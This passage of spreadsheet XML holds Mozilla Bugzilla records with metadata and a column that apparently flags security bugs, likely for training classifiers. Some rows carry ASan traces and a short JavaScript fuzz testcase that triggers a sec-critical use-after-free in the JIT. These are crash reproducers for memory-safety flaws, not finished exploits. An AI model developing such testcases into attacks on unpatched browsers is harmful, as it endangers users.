Firefox: ASAN build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1414761627/
From stack-trace I would say this is related to bug 1041512
ASAN-trace:
==21046==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000352148 at pc 0x7f5f34d4cb35 bp 0x7ffff9536760 sp 0x7ffff9536758
READ of size 8 at 0x60c000352148 thread T0
    #0 0x7f5f34d4cb34 in Length /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/layout/generic/../../dist/include/nsTArray.h:330:0
    #1 0x7f5f34d4cb34 in IsEmpty /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/layout/generic/../../dist/include/nsTArray.h:333:0
    #2 0x7f5f34d4cb34 in nsTransformedTextRun::SetCapitalization(unsigned int, unsigned int, bool*, gfxContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextRunTransformations.cpp:60:0
    #3 0x7f5f319942ca in nsLineBreaker::AppendText(nsIAtom*, char16_t const*, unsigned int, unsigned int, nsILineBreakSink*) /builds/slave/m-cen-l64-asan-000000000000000/build/dom/base/nsLineBreaker.cpp:291:0
    #4 0x7f5f31994cfb in nsLineBreaker::AppendText(nsIAtom*, unsigned char const*, unsigned int, unsigned int, nsILineBreakSink*) /builds/slave/m-cen-l64-asan-000000000000000/build/dom/base/nsLineBreaker.cpp:327:0
    #5 0x7f5f34d04465 in BuildTextRunsScanner::SetupBreakSinksForTextRun(gfxTextRun*, void const*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:2418:0
    #6 0x7f5f34cfa893 in BuildTextRunsScanner::SetupLineBreakerContext(gfxTextRun*) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:2323:0
    #7 0x7f5f34cf8a93 in BuildTextRunsScanner::FlushFrames(bool, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:1462:0
    #8 0x7f5f34d015fd in BuildTextRunsScanner::ScanFrame(nsIFrame*) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:1702:0
    #9 0x7f5f34d017dc in BuildTextRunsScanner::ScanFrame(nsIFrame*) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:1712:0
    #10 0x7f5f34d06ee5 in BuildTextRuns /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:1385:0
    #11 0x7f5f34d06ee5 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:2578:0
.
.
.
0x60c000352148 is located 12 bytes to the right of 124-byte region [0x60c0003520c0,0x60c00035213c)
allocated by thread T0 here:
    #0 0x471d71 in malloc _asan_rtl_:0
    #1 0x7f5f3139afc9 in AllocateStorageForTextRun /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/thebes/gfxTextRun.cpp:108:0
    #2 0x7f5f3139afc9 in Create /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/thebes/gfxTextRun.cpp:125:0
    #3 0x7f5f3139afc9 in gfxFontGroup::MakeSpaceTextRun(gfxTextRunFactory::Parameters const*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/thebes/gfxTextRun.cpp:1907:0
    #4 0x7f5f34cfe45d in MakeTextRun&lt;unsigned char&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:566:0
    #5 0x7f5f34cfe45d in BuildTextRunsScanner::BuildTextRunForFrames(void*) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:2164:0
    #6 0x7f5f34cf9120 in BuildTextRunsScanner::FlushFrames(bool, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:1481:0
    #7 0x7f5f34d015fd in BuildTextRunsScanner::ScanFrame(nsIFrame*) /builds/slave/m-cen-l64-asan-000000000000000/build/layout/generic/nsTextFrame.cpp:1702:0
.
.
.</t>
        </is>
      </c>
      <c r="X1304" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1305">
      <c r="A1305" t="n">
        <v>38854</v>
      </c>
      <c r="B1305" t="inlineStr">
        <is>
          <t>2000-05-10 16:06:47 -0700</t>
        </is>
      </c>
      <c r="C1305" t="inlineStr">
        <is>
          <t>reports.cgi needs to escape (untrusted) url params</t>
        </is>
      </c>
      <c r="D1305" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E1305" t="n">
        <v>1</v>
      </c>
      <c r="F1305" t="n">
        <v>1</v>
      </c>
      <c r="G1305" t="n">
        <v>4</v>
      </c>
      <c r="H1305" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1305" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1305" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1305" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1305" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1305" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N1305" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1305" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1305" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q1305" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1305" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1305" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T1305" t="n">
        <v>1</v>
      </c>
      <c r="U1305" t="n">
        <v>0</v>
      </c>
      <c r="V1305" t="n">
        <v>11</v>
      </c>
      <c r="W1305" t="inlineStr">
        <is>
          <t>note that reports.cgi has several output modes, so this needs to be fixed for 
all modes.</t>
        </is>
      </c>
      <c r="X1305" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1306">
      <c r="A1306" t="n">
        <v>726332</v>
      </c>
      <c r="B1306" t="inlineStr">
        <is>
          <t>2012-02-11 11:21:57 -0800</t>
        </is>
      </c>
      <c r="C1306" t="inlineStr">
        <is>
          <t>nsFormFillController's MutationObserver handling is suspicious</t>
        </is>
      </c>
      <c r="D1306" t="inlineStr">
        <is>
          <t>2012-05-18 13:25:58 -0700</t>
        </is>
      </c>
      <c r="E1306" t="n">
        <v>1</v>
      </c>
      <c r="F1306" t="n">
        <v>1</v>
      </c>
      <c r="G1306" t="n">
        <v>3</v>
      </c>
      <c r="H1306" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1306" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1306" t="inlineStr">
        <is>
          <t>Autocomplete</t>
        </is>
      </c>
      <c r="K1306" t="inlineStr">
        <is>
          <t>12 Branch</t>
        </is>
      </c>
      <c r="L1306" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1306" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1306" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1306" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1306" t="inlineStr">
        <is>
          <t>[sg:critical][qa-] fixed in 726334, 730470</t>
        </is>
      </c>
      <c r="Q1306" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1306" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1306" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1306" t="n">
        <v>1</v>
      </c>
      <c r="U1306" t="n">
        <v>0</v>
      </c>
      <c r="V1306" t="n">
        <v>17</v>
      </c>
      <c r="W1306" t="inlineStr">
        <is>
          <t>nsFormFillController uses MutationObserver for input.list, but nothing, 
if I read the code correctly, enforces that MutationObserver is actually removed.
Everything works usually ok, but if list element gets moved to some other document
and modified there, there could be some sg:crit crashes, I think.</t>
        </is>
      </c>
      <c r="X1306" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1307">
      <c r="A1307" t="n">
        <v>1425590</v>
      </c>
      <c r="B1307" t="inlineStr">
        <is>
          <t>2017-12-15 14:50:44 -0800</t>
        </is>
      </c>
      <c r="C1307" t="inlineStr">
        <is>
          <t>Need new MCWS component, and retire old Community IT ones</t>
        </is>
      </c>
      <c r="D1307" t="inlineStr">
        <is>
          <t>2020-07-29 08:27:35 -0700</t>
        </is>
      </c>
      <c r="E1307" t="n">
        <v>1</v>
      </c>
      <c r="F1307" t="n">
        <v>1</v>
      </c>
      <c r="G1307" t="n">
        <v>7</v>
      </c>
      <c r="H1307" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1307" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J1307" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K1307" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L1307" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1307" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1307" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1307" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1307" t="inlineStr">
        <is>
          <t>[needs-user-story]</t>
        </is>
      </c>
      <c r="Q1307" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1307" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1307" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1307" t="n">
        <v>1</v>
      </c>
      <c r="U1307" t="n">
        <v>0</v>
      </c>
      <c r="V1307" t="n">
        <v>24</v>
      </c>
      <c r="W1307" t="inlineStr">
        <is>
          <t>MCWS would like to clean up our Bugzilla presence. Please let me know if any of the following should be requested as separate bugs. We would like:
1. An MCWS component under Participation Infrastructure
The bugs in the following components would go here instead, and so they can be migrated and the components removed:
Mozilla Reps 
- Community IT Request
Infrastructure &amp; Operations
- Community IT
- Community IT: Hosting
- Community IT: Infrastructure
- Community IT: Others
- Community IT: Wordpress
* Note Community IT: Discourse is still being used by another team and should not be moved or removed
2. Update form.reps.it
MCWS is its own module, so the link should be something like form.mcws.new
The form should say "MCWS New Resource Request" instead of "Community IT Request"
3. New mcws-team and mcws-admin groups so that we can keep domain requests private 
Currently doing this by using reps group in the Reps Community IT component.
Members of the admin group should be myself, tom@mozilla.org.uk and Michael Koehler (will cc).</t>
        </is>
      </c>
      <c r="X1307" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1308">
      <c r="A1308" t="n">
        <v>472776</v>
      </c>
      <c r="B1308" t="inlineStr">
        <is>
          <t>2009-01-08 18:20:01 -0800</t>
        </is>
      </c>
      <c r="C1308" t="inlineStr">
        <is>
          <t>Crash [@ UnhookTextRunFromFrames] [@ ClearAllTextRunReferences] with bidi</t>
        </is>
      </c>
      <c r="D1308" t="inlineStr">
        <is>
          <t>2018-05-03 13:12:53 -0700</t>
        </is>
      </c>
      <c r="E1308" t="n">
        <v>1</v>
      </c>
      <c r="F1308" t="n">
        <v>1</v>
      </c>
      <c r="G1308" t="n">
        <v>3</v>
      </c>
      <c r="H1308" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1308" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1308" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1308" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1308" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1308" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1308" t="inlineStr">
        <is>
          <t>[sg:critical] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q1308" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1308" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1308" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T1308" t="n">
        <v>1</v>
      </c>
      <c r="U1308" t="n">
        <v>0</v>
      </c>
      <c r="V1308" t="n">
        <v>25</v>
      </c>
      <c r="W1308" t="inlineStr">
        <is>
          <t>Created attachment 356114
testcase (causes shutdown crash)
Steps to reproduce:
1. Load the testcase.
2. Quit Firefox.
Result: crash [@ UnhookTextRunFromFrames] or [@ ClearAllTextRunReferences].  If MallocScribble is enabled, the crash involves dereferencing 5555567d, but without MallocScribble, a random address gets called.</t>
        </is>
      </c>
      <c r="X1308" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1309">
      <c r="A1309" t="n">
        <v>285648</v>
      </c>
      <c r="B1309" t="inlineStr">
        <is>
          <t>2005-03-10 14:11:40 -0800</t>
        </is>
      </c>
      <c r="C1309" t="inlineStr">
        <is>
          <t>Camino displays subframe's URL in location bar</t>
        </is>
      </c>
      <c r="D1309" t="inlineStr">
        <is>
          <t>2005-04-02 04:57:50 -0800</t>
        </is>
      </c>
      <c r="E1309" t="n">
        <v>1</v>
      </c>
      <c r="F1309" t="n">
        <v>1</v>
      </c>
      <c r="G1309" t="n">
        <v>6</v>
      </c>
      <c r="H1309" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1309" t="inlineStr">
        <is>
          <t>Camino Graveyard</t>
        </is>
      </c>
      <c r="J1309" t="inlineStr">
        <is>
          <t>Location Bar &amp; Autocomplete</t>
        </is>
      </c>
      <c r="K1309" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1309" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1309" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1309" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1309" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1309" t="inlineStr">
        <is>
          <t>patch</t>
        </is>
      </c>
      <c r="Q1309" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1309" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1309" t="inlineStr">
        <is>
          <t>Camino0.9</t>
        </is>
      </c>
      <c r="T1309" t="n">
        <v>1</v>
      </c>
      <c r="U1309" t="n">
        <v>0</v>
      </c>
      <c r="V1309" t="n">
        <v>17</v>
      </c>
      <c r="W1309" t="inlineStr">
        <is>
          <t>When a page has a subframe, Camino will display the subframe's URL in the
location bar instead of the main page's.  NYTimes.com is a good example. 
Instead of http://www.nytimes.com, the location bar shows
http://ad.doubleclick.net/adi/N3016.nytimes.comSD6440/B1495671.6;sz=88x60;ord=2005.03.10.22.06.34?
This started showing up in the 20050309 nightly.</t>
        </is>
      </c>
      <c r="X1309" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1310">
      <c r="A1310" t="n">
        <v>519229</v>
      </c>
      <c r="B1310" t="inlineStr">
        <is>
          <t>2009-09-28 09:37:28 -0700</t>
        </is>
      </c>
      <c r="C1310" t="inlineStr">
        <is>
          <t>purge_builds.py shouldn't count the current build directory as "used"</t>
        </is>
      </c>
      <c r="D1310" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1310" t="n">
        <v>1</v>
      </c>
      <c r="F1310" t="n">
        <v>1</v>
      </c>
      <c r="G1310" t="n">
        <v>5</v>
      </c>
      <c r="H1310" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1310" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1310" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1310" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1310" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1310" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1310" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1310" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1310" t="inlineStr">
        <is>
          <t>[automation][oldbugs]</t>
        </is>
      </c>
      <c r="Q1310" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1310" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1310" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1310" t="n">
        <v>1</v>
      </c>
      <c r="U1310" t="n">
        <v>0</v>
      </c>
      <c r="V1310" t="n">
        <v>15</v>
      </c>
      <c r="W1310" t="inlineStr">
        <is>
          <t>I've noticed that even after two builds in a row from the exact same builder happen on the same slave, sometimes purge_builds.py tries to clean up.</t>
        </is>
      </c>
      <c r="X1310" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1311">
      <c r="A1311" t="n">
        <v>1550955</v>
      </c>
      <c r="B1311" t="inlineStr">
        <is>
          <t>2019-05-11 03:26:31 -0700</t>
        </is>
      </c>
      <c r="C1311" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::SourceListener::StopSharing]</t>
        </is>
      </c>
      <c r="D1311" t="inlineStr">
        <is>
          <t>2020-06-05 00:04:22 -0700</t>
        </is>
      </c>
      <c r="E1311" t="n">
        <v>1</v>
      </c>
      <c r="F1311" t="n">
        <v>1</v>
      </c>
      <c r="G1311" t="n">
        <v>3</v>
      </c>
      <c r="H1311" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1311" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1311" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K1311" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L1311" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1311" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1311" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1311" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1311" t="inlineStr">
        <is>
          <t>[post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1311" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1311" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1311" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T1311" t="n">
        <v>1</v>
      </c>
      <c r="U1311" t="n">
        <v>0</v>
      </c>
      <c r="V1311" t="n">
        <v>9</v>
      </c>
      <c r="W1311" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-240cd7fb-e555-4bd7-9c93-82e780190511.
```
Top 10 frames of crashing thread:
0 xul.dll void mozilla::SourceListener::StopSharing dom/media/MediaManager.cpp:4449
1 xul.dll void mozilla::GetUserMediaWindowListener::StopSharing dom/media/MediaManager.cpp:4596
2 xul.dll static void mozilla::MediaManager::IterateWindowListeners&lt;`lambda at z:/task_1557522085/build/src/dom/media/MediaManager.cpp:3910:15'&gt; dom/media/MediaManager.cpp:3925
3 xul.dll nsresult mozilla::MediaManager::Observe dom/media/MediaManager.cpp:3783
4 xul.dll nsObserverList::NotifyObservers xpcom/ds/nsObserverList.cpp:66
5 xul.dll nsObserverService::NotifyObservers xpcom/ds/nsObserverService.cpp:295
6 xul.dll NS_InvokeByIndex 
7 xul.dll static bool XPCWrappedNative::CallMethod js/xpconnect/src/XPCWrappedNative.cpp:1157
8 xul.dll static bool XPC_WN_CallMethod js/xpconnect/src/XPCWrappedNativeJSOps.cpp:943
9 xul.dll js::InternalCallOrConstruct js/src/vm/Interpreter.cpp:535
```
this crash signature is starting to show up in the 68.0a1 nightly cycle - the first affected build was 20190430121130.</t>
        </is>
      </c>
      <c r="X1311" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1312">
      <c r="A1312" t="n">
        <v>415252</v>
      </c>
      <c r="B1312" t="inlineStr">
        <is>
          <t>2008-02-01 09:57:19 -0800</t>
        </is>
      </c>
      <c r="C1312" t="inlineStr">
        <is>
          <t>gmail (new version) doesn't show names in contacts list</t>
        </is>
      </c>
      <c r="D1312" t="inlineStr">
        <is>
          <t>2015-04-19 23:39:42 -0700</t>
        </is>
      </c>
      <c r="E1312" t="n">
        <v>1</v>
      </c>
      <c r="F1312" t="n">
        <v>1</v>
      </c>
      <c r="G1312" t="n">
        <v>6</v>
      </c>
      <c r="H1312" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1312" t="inlineStr">
        <is>
          <t>Tech Evangelism Graveyard</t>
        </is>
      </c>
      <c r="J1312" t="inlineStr">
        <is>
          <t>English US</t>
        </is>
      </c>
      <c r="K1312" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1312" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1312" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1312" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1312" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1312" t="inlineStr"/>
      <c r="Q1312" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1312" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1312" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1312" t="n">
        <v>1</v>
      </c>
      <c r="U1312" t="n">
        <v>18</v>
      </c>
      <c r="V1312" t="n">
        <v>65</v>
      </c>
      <c r="W1312" t="inlineStr">
        <is>
          <t>Looking at your contacts in gmail (the new version, which can be selected once you log in), you'll see a 3-column view, the left most column has "All Contacts", "Most Wanted", etc, clicking on those brings up a list in the middle column with the names of the contacts in that group, with a checkbox next to each name. The checkbox shows up, but there's no name next to it when using Firefox 3.
No errors on the JS console. Using the DOM inspector you can see that the name is there' but it looks like it starts behind the checkbox, and something is obscuring it (it's actually displayed after you click on the DOM text node in the DOM inspector, but it's on on top of the check box instead of next to it). Assigning to layout.</t>
        </is>
      </c>
      <c r="X1312" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1313">
      <c r="A1313" t="n">
        <v>1143679</v>
      </c>
      <c r="B1313" t="inlineStr">
        <is>
          <t>2015-03-16 07:37:43 -0700</t>
        </is>
      </c>
      <c r="C1313" t="inlineStr">
        <is>
          <t>Crash [@ js::UnwindIteratorForException] or Assertion failure: moreAllocations(), at jit/JitFrameIterator.h:454 or heap-use-after-free [@ js::jit::CompactBufferReader::readByte]</t>
        </is>
      </c>
      <c r="D1313" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:24 -0800</t>
        </is>
      </c>
      <c r="E1313" t="n">
        <v>1</v>
      </c>
      <c r="F1313" t="n">
        <v>1</v>
      </c>
      <c r="G1313" t="n">
        <v>3</v>
      </c>
      <c r="H1313" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1313" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1313" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1313" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1313" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1313" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1313" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1313" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1313" t="inlineStr">
        <is>
          <t>[jsbugmon:ignore][adv-main39+][adv-esr31.8+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q1313" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1313" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1313" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T1313" t="n">
        <v>1</v>
      </c>
      <c r="U1313" t="n">
        <v>0</v>
      </c>
      <c r="V1313" t="n">
        <v>43</v>
      </c>
      <c r="W1313" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 436686833af0 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-debug, run with --fuzzing-safe --ion-offthread-compile=off --ion-eager):
function foo() {
  function gen() {
    try {
      yield 1;
    } finally {
      bar();
    }
  }
  for (i in gen()) {
    for each (var i in this) 
	return false;   
  }
} foo();
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
js::UnwindIteratorForException (cx=cx@entry=0x1734b60, obj=obj@entry=...) at js/src/jsobj.h:128
#0  js::UnwindIteratorForException (cx=cx@entry=0x1734b60, obj=obj@entry=...) at js/src/jsobj.h:128
#1  0x000000000071d64f in CloseLiveIterator (localSlot=&lt;optimized out&gt;, frame=..., cx=0x1734b60) at js/src/jit/JitFrames.cpp:388
#2  HandleExceptionIon (overrecursed=0x7fffffffb7f0, rfe=0x7fffffffc280, frame=..., cx=0x1734b60) at js/src/jit/JitFrames.cpp:464
#3  js::jit::HandleException (rfe=0x7fffffffc280) at js/src/jit/JitFrames.cpp:782
#4  0x00007ffff7fe815d in ?? ()
[...]
#24 0x0000000000000000 in ?? ()
rax	0xfff9000000000000	-1970324836974592
rbx	0x1734b60	24333152
rcx	0xf	15
rdx	0x1734b78	24333176
rsi	0x16eab40	24030016
rdi	0x1743810	24393744
rbp	0x7fffffffb880	140737488337024
rsp	0x7fffffffb720	140737488336672
r8	0x17cef60	24964960
r9	0x3bb1eea0	1001516704
r10	0x17cef60	24964960
r11	0x7fffffffb720	140737488336672
r12	0x1	1
r13	0x7fffffffb8d0	140737488337104
r14	0x7fffffffb870	140737488337008
r15	0x1818938	25266488
rip	0x870b49 &lt;js::UnwindIteratorForException(JSContext*, JS::Handle&lt;JSObject*&gt;)+105&gt;
=&gt; 0x870b49 &lt;js::UnwindIteratorForException(JSContext*, JS::Handle&lt;JSObject*&gt;)+105&gt;:	mov    (%rcx),%rdx
   0x870b4c &lt;js::UnwindIteratorForException(JSContext*, JS::Handle&lt;JSObject*&gt;)+108&gt;:	mov    (%rdx),%rdx
S-s and sec-critical because on ASan builds this shows up as a heap-use-after-free.</t>
        </is>
      </c>
      <c r="X1313" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1314">
      <c r="A1314" t="n">
        <v>723773</v>
      </c>
      <c r="B1314" t="inlineStr">
        <is>
          <t>2012-02-02 17:12:52 -0800</t>
        </is>
      </c>
      <c r="C1314" t="inlineStr">
        <is>
          <t>Liveness analysis makes mistakes when analyzing try/catch</t>
        </is>
      </c>
      <c r="D1314" t="inlineStr">
        <is>
          <t>2012-07-11 20:00:40 -0700</t>
        </is>
      </c>
      <c r="E1314" t="n">
        <v>1</v>
      </c>
      <c r="F1314" t="n">
        <v>1</v>
      </c>
      <c r="G1314" t="n">
        <v>3</v>
      </c>
      <c r="H1314" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1314" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1314" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1314" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1314" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1314" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1314" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1314" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1314" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1314" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1314" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1314" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T1314" t="n">
        <v>1</v>
      </c>
      <c r="U1314" t="n">
        <v>0</v>
      </c>
      <c r="V1314" t="n">
        <v>9</v>
      </c>
      <c r="W1314" t="inlineStr">
        <is>
          <t>Created attachment 594024
patch
This was basically a mistake over the meaning of some arguments to the Lifetime constructor, I think. The fix is simple.
